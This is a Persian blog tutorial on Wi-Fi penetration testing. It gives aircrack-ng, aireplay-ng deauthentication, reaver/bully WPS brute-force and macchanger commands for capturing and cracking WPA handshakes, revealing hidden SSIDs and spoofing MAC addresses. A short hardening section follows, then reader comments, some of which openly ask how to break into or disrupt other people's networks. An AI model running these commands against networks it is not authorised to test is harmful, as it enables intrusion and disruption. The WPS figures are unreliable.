امنیتتست نفوذ

تست نفوذ شبکه های وای فای

تست نفوذ شبکه های وای فای با کالی لینوکس

این روزها با افزایش محبوبیت شبکه های وایرلس در بین مردم، بحث تست نفوذ وای فای نیز خیلی داغ شده است. اگر دقت کرده باشید این بحث شیرین یکی از مراحل “نقشه راه ورود به دنیایی سایبری” را هم شامل می شود. پس می توان گفت که این امر در بین هکرها نیز خیلی محبوب میباشد.

خیلی از افراد فکر میکنند که شبکه وایرلس آنها فقط به دلیل استفاده از اینترنتشان مورد نفوذ قرار می گیرد اما باید بگم که سخت در اشتباه هستند. زیرا یک نفوذگر کلاه سیاه با نفوذ خود به شبکه وایرلس شما، میتواند تمامی اهداف خود را پیاده سازی کند که به عنوان مثال، این اهداف میتواند شامل اسنیف گذرواژه های شما باشد یا نفوذ به دیوایس های موجود بر روی شبکه شما باشد. پس علاوه بر استفاده از اینترنت شما، کارهایی به مراتب خطرناک تر هم امکان دارد انجام پذیرد. از این رو است که امنیت شبکه های وایرلس معنای بزرگی به خود می گیرند و حرف پروتکل های امنیتی به وسط می آید.

به طور کلی در شبکه های وای فای ۳ نوع پروتکل امنیتی وجود دارد که عبارتند از:

  • WEP: پروتکل احراز هویت و رمزنگاری دیتا در سرویس گیرنده­ های شبکه وایرلس است؛ اما این شیوه قدیمی شده است و با اینکه استاندارد اصلی امنیت در شبکه وایرلس محسوب می شود اما به ­راحتی قابل کرک شدن است.
  • WPA: این شیوه یک پروتکل پیشرفته احراز هویت و رمزنگاری دیتا در سرویس گیرنده­ های شبکه وایرلس است که از رمزنگاری­ های MIC ، TKIP و AES استفاده می­ کند. همچنین در این روش از رمزنگاری­ های bit CRC 32، bit IV48 و  TKIP برای تأمین امنیت وایرلس استفاده می ­شود.
  • WPA2: این روش از (AES (128 و CCMP برای رمزگذاری دیتای وایرلس استفاده می­ کند و تاکنون قویترین پروتکل امنیتی در وایرلس ها میباشد. هر چند که آسیب پذیری ها خاص خودش را دارد.

تست نفوذ وای فای

قبل از بحث تست نفوذ ما باید با ۳ اصل امنیت آشنا باشیم که عبارتند از محرمانه بودن، صداقت و در دسترس بودن است. هکرها نیز از عدم وجود یکی یا چندتا از این اصل ها هدف مخرب خود را در شبکه ها یا سازمان ها پیاده سازی می کنند. برای رسیدن به امنیت واقعی، تمام این سه مفاهیم به ­طور خاص مورد نیاز است. با استفاده از سه مفاهیم ذکر شده در امنیت شبکه، می­توان تا درصد بالایی امنیت را تضمین نمود. مهاجمین همیشه در تلاش هستند تا یکی یا بیشتر از این سه اصل امنیتی را به خطر بیاندازند.(برای آشنایی بیشتر با ۳ اصل امنیت اینجا را مطالعه کنید)

تست نفوذ وای فای با ابزار Aircrack-ng

Aircrack-ng یک مجموعه کامل از ابزارها برای ارزیابی امنیت شبکه های وایرلس WiFi است. این ابزار در زمینه های مختلف امنیتی تمرکز دارد که در زیر به آنها اشاره می­کنیم:

  • نظارت :(Monitoring) ضبط بسته و خروجی گرفتن از داده ها به صورت فایل های متنی برای پردازش بیشتر.
  • حمله :(Attacking) شناسایی اکسس پوینت های مخفی، ایجاد نقاط دسترسی جعلی ،طریق تزریق بسته.
  • تست :(Testing) بررسی کارت شبکه ها به منظور داشتن قابلیت تزریق بسته و …
  • شکستن پسورد(Cracking): کرک کردن پسورد پروتکل های امنیتیWEP و (WPA PSK (WPA 1 and 2

مراحل لازم برای تست نفوذ وای فای با پروتکل wpa2/wpa با ابزار Aircrack-ng

این روش حمله با نام هندشیک (Handshake) گیری شناخته میشود و میتوان بر روی تمامی پروتکل های امنیتی پیاده سازی کرد. مراحل تست نفوذ به صورت زیر میباشد:

airmon-ng

airmon-ng check kill

airmon-ng start (Interface. EX: wlan0)

1 - تست نفوذ شبکه های وای فای

airodump-ng (Interface-Mode. EX: wlan0mon)

2 - تست نفوذ شبکه های وای فایبعد از اسکن شبکه های وایرلس اطراف، با دستور Ctrl+C اسکن خود را استاپ میکنیم تا تارگت خود را انتخاب کنیم:

airodump-ng --bssid (BSSID) -c (Channel#) -w (Handshake) (Interface-Mode)

آرگومان های استفاده شده در دستور بالا به شرح زیر میباشد:

  • آرگومان bssid مربوط به مک آدرس تارگت میباشد.
  • آرگومان c مربوط به چنل شبکه وایرلس تارگت میباشد.
  • آرگومان w برای ذخیره فایل هندشیک گرفته شده به کار میرود.

6 - تست نفوذ شبکه های وای فای

در حالی که دستور بالا در حالت ضبط بسته ها است در پنجره ترمینال جدید دستورات زیر را برای ارسال نویز و قطع و وصل کردن شبکه تارگت استفاده می کنیم:

aireplay-ng -0 5 -a (BSSID) -c (STATION) (Interface-Mode)

4 - تست نفوذ شبکه های وای فای

سپس بعد از اینکه هندشیک ما از وایرلس تارگت گرفته شد، دستور زیر را برای شکستن فایل .cap یا هندشیک خود به کار می بریم:

aircrack-ng  -a(1=WEP ، ۲=WPA) -b (BSSID) -w (Passlist).txt (Handshake).cap

آرگومان های استفاده شده در دستور بالا به شرح زیر میباشد:

  • آرگومان a برای مشخص کردن نوع پروتکل میباشد.
  • آرگومان b برای وارد کردن مک ادرس تارگت به کار میرود.
  • آرگومان w برای وارد کردن پسورد لیست به کار میرود.

بعد از انجام کرک، اگر پسورد شما در لیست وجود داشته باشد برای شما پیدا خواهد کرد.

7 - تست نفوذ شبکه های وای فای

مراحل لازم برای تست نفوذ شبکه های وای فای با مکانیزم WPS

ابتدا باید شبکه هایی که از این مکانیزم استفاده میکنند راشناسایی کنیم که یکی از کاربردی ترین ابزارها در این زمینه wash می باشد.

10 - تست نفوذ شبکه های وای فای

سپس بعد از شناسایی وایرلس مورد نظر، از روش های زیر برای تست نفوذ استفاده می کنیم:

  • استفاده از ابزار Reaver
reaver -i (Interface-Mode) -b (BSSID) -e (ESSID) -S -c (Channel#) -vvv -K 1
  • استفاده از ابزار Bully
bully -b (BSSID) -c (Channel#) -B (Interface-Mode)

مراحل لازم برای پیدا کردن SSIDهای مخفی

خیلی از افراد فکر میکنند که با مخفی کردن نام وایرلس خود در امان خواهند بود. اما خیلی راحت میتوان این مکانیزم امنیتی را دور زد. که در ادامه خواهید دید:

airodump-ng -w (Handshake) --bssid (BSSID) -c (Channel#) (Interface-Mode)

بعد از اجرای دستور بالا، صفحه ترمینال جدیدی باز میکنیم و دستور زیر را برای ارسال نویز به شبکه وایرلس وارد می کنیم:

aireplay-ng -0 1000 -a (BSSID) -c (STATION) (Interface-Mode)

مراحل لازم برای بایپس مکانیزم Mac Filtering

ابتدا میتوانیم با دستور netdiscover تمامی دیوایس های متصل به شبکه را به دست بیاوریم. سپس مک آدرس مد نظر را کپی کرده و در ادامه به عنوان مک ادرس سیستم خود تنظیم میکنیم:

ifconfig (Interface) down

macchanger -m (MAC TARGET) (Interface)

ifconfig (Interface) up

macchanger -e (Interface)

macchanger - تست نفوذ شبکه های وای فای


دوره آموزشی تست نفوذ شبکه های وایرلس

برای تهیه این دوره بر روی تصویر زیر کلیک کنید.

دوره آموزشی تست نفوذ شبکه های وایرلس
دوره آموزشی تست نفوذ شبکه های وایرلس

چگونه وای فای خود را غیرقابل هک کنیم؟

برای افزایش امنیت وای فای و جلوگیری از هک شدن آن میتوایند مراحل زیر را انجام دهید.

  • غیرفعال کردن قابلیت wps
  • مخفی کردن ssid وای فای
  • انتخاب پسورد قوی
  • و …

غیرفعال کردن wps

WPS یا (Wi-Fi Protected Setup) تکنولوژی تنظیم حفاظت شده‌ی وای فای و یک استاندارد برای تنظیمات امنیتی شبکه‌های وای فای است که برای راحتی کاربران آماتور ساخته شده است. مودم روترهای مجهز به این تکنولوژی از یک رمز 8 رقمی (یا یک دکمه مخصوص) برای برقراری ارتباط استفاده می‌کنند.

کل حالت‌های ممکن برای رمز عددی 10 به توان 8 حالت است که فرایند نفوذ را آسان می‌کند. این ضعف امنیتی تنها در مودم روترهایی که در سالهای 2006 تا 2012 میلادی تولید شده‌اند وجود دارد.

برای غیرفعال سازی آن در مودم های d-link و tp-link به صورت زیر عمل کنید.

ابتدا وارد کانفیگ مودم به آدرس 192.168.1.1 شده و یوزر و پسورد خود را وارد می کنیم که به صورت پیش فرض admin/admin میباشد. سپس مانند تصویر زیر تنظیمات غیرفعال کردن را اعمال میکنیم.

برای مودم های TP-LINK

غیرفعال کردن wps

برای مودم های D-LINK

غیرفعال کردن wps

انتخاب پسورد مناسب و قوی

خب حساس ترین مرحله در امن سازی وای فای، انتخاب پسورد قوی می باشد. پسورد شما باید ترکیبی از حروف کوچک و بزرگ، علائم نگارشی و اعداد باشد همچنین طول پسورد شما باید بیش از 10 رقم باشد تا عملیات کرک یا شکستن آن به راحتی انجام نشود.

یوسف وفایی

فارغ التحصیل کارشناسی IT، علاقه مند به برنامه نویسی و علم امنیت، عاشق یادگیری حرفه های جدید، کنجکاو برای همه چیز، همچنین همیشه تلاش میکنم تا به هدفم برسم...

‫28 دیدگاه ها

  1. سلام من کارت شبکه ندارم آیا امکان استفاده از دانگل به جای کارت شبکه در این نوع نفوذ هست

  2. اگر میشه بگید که چه تستی رو باید انجام بدم
    کارت شبکه رو امتحان کردم ولی همه چی درست بوده، تمام مراحل هم انجام میشه اما وقتی که airodump-ng wlan0mon رو میزنم حتی هیچ اروری نمیده ولی هیچ accespointی رو هم نمیاره!

    1. سلام،
      تست فرکانس و کانال درست:
      مطمئن شوید که فرکانس و کانال مورد نظر در airodump-ng به درستی تنظیم شده باشد. با استفاده از دستور زیر می‌توانید فرکانس مورد نظر را تعیین کنید و سپس با اجرای airodump-ng ، آن را مشاهده کنید:

      sudo iwconfig wlan0mon channel channel_number
      بررسی کارت شبکه مناسب:
      اگر کارت شبکه شما مشکلاتی دارد یا پشتیبانی مناسب از حالت Monitor ندارد، ممکن است بهتر باشد از کارت شبکه دیگری استفاده کنید که توسط ابزارهای اجرایی مانند airodump-ng به درستی پشتیبانی شود.

  3. سلام ممنون از اموزش خوبتون
    من وقتی که airodump-ngرو میزنم هیچ وایفایی رو اسکن نمیکنه
    کالی رو هم به صورت کامل روی لپتاپ نصب کردم کارت شبکه هم حالت مانیتور هست اما با وجود اینکه وایفای در چند سانتیمتری لپتاپ هست چیزی پیدا نمیشه

  4. سلام اگه بخوایم با وای فای دستگاه دیگری که بهش متصله رو با کالی خاموش کنیم چه دستوری باید بزنیم؟

  5. سلام من ایرکرک رو نصب کردم اما کالی رو نه . میخواستم بپرسم ایرکرک حتما باید با کالی باشه یا خودش تنهایی هم میتونه اگه تنهایی میتونه من این دستورات رو توی ایرکرک نوشتم اما انگار نمیشناسه

  6. سلام تمام این کارها روی کالی لینوکس انجام میشه؟؟؟ از طریق cmd راهی هست که وای فای را هک کرد؟؟ممنون میشم جواب بدید.

    1. سلام
      بله از طریق لینوکس و ابزار ایرکرک انجام میشه.
      در cmd فقط میتونید فایل cap یا همون هندشیک گرفته شده در ایرکرک و کرک کنید.

  7. با سلام کالی روی لب تاب 2017 تا 94 درصد میره بهد نصب نمیشه مشکل چیست روی خود سیستم نه مجازی ساز

  8. سلام
    بنده تمامی این روش هایی که گفتید انجام دادم ولی میخواستم بدونم راهی هست که بدون پسوردلیست بتونیم رمز وای فای های wpa2 یا wpa را دربیاریم؟ ممکنه چندین هزار پسوردلیست امتحان کنیم و پسورد مورد نظر نباشه
    اگه روشی هست لطفا آموزش دهید

      1. Wifi fisherواقعا عاليه من اموزشش رو نگاه كردم زبان انگليسى بود ممنون ميشم شما خودتون ركورد كنيد و اگر ميشه به صورت كامل توضيح بدين?❤️?

  9. airodump-ng –bssid (BSSID) -c (Channel#) -w (Handshake) (Interface-Mode) این خط کد رو می زنم اجرا نمیکنه

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *


دکمه بازگشت به بالا